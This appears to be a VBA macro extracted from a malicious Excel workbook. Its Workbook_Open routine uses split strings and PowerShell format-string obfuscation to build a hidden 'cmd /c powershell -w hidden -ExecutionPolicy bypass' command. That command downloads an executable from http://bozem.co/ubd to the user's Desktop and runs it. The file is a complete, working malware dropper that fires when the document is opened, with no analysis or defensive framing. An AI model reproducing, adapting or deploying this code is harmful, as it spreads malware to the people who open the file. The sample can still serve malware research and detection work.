Filename     : ./macros/ef97c83ab66f03862165464c9415d49105b35c8ff3f381bde834892a82b72e34
OLE stream   : _VBA_PROJECT_CUR/VBA/ThisWorkbook
VBA filename : ThisWorkbook.cls
----------------------------------------
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True




Function hipperstars()
If msoBulletPicture > 0 Then


boolballall = Array(Now(), "NOnInt", Now(), Now())
figiremabli = Array(Minute(Now), Now(), "ErS" + "he", Minute(Now))
sigamegaloaft = "ass  "
waptermsand = Array(Now(), "opRo" + "Fi -W", Now())
singapurevolime = Array(Now(), "ass  " + "  """, Minute(Now), Minute(Now), "d   " + "/c""", Now())
frruiterkeep = Array(Second(Now), Now(), Now(), Now(), "deN -N")


fahajahaa = Array(Second(Now), Now(), Second(Now), Now(), Now(), "eCU" + "TI", Minute(Now), Now(), Second(Now))

hipperstars = "cm" + singapurevolime(4) + "pOW" + figiremabli(2) + "Ll -n" + waptermsand(1) + "In  hiD" + frruiterkeep(4) + "OLo -" + boolballall(1) + "eRA  -eX" + fahajahaa(5) + "oNp bYp" + singapurevolime(1)
End If
End Function
Sub Workbook_Open()
If contverresUnverified > 0.9 Then
Dim vagadenmarkus As String
Randomize
vagadenmarkus = Int(Rnd * 8966894#)
techblueand = "$7d0mK6 = [TyPE](\""{1}{0}{3}{2}\"" -f 'on','ENVIr','Nt','mE') ;  "
engsiniores = "do{&(\""{1}{0}\"" -f'ep','sle') 33;${D`es} =  $7d0mk6::gETfoLDERpATh(\""Desktop\"");(&(\""{0}{1}{2}\"" -f'Ne','w-','Object') "
rabbeiego = vagadenmarkus
baltimoruss = "(\""{0}{2}{1}{3}{5}{6}{4}\""-f'Sy','te','s','m.Ne','ent','t.Web','Cli')).dowNLoaDFilE.iNVoKE(\""http://bozem.co/ubd\"",\""$Des\" + rabbeiego + ".exe\"")}"
familiesnames = "while(!${?});&(\""{0}{2}{3}{1}\""-f 'St','ocess','art','-Pr') $Des\" + rabbeiego + ".exe"""
rubicvonv = techblueand + engsiniores + baltimoruss + familiesnames
Shell hipperstars + rubicvonv, fmTabStyleTabs
End If
End Sub





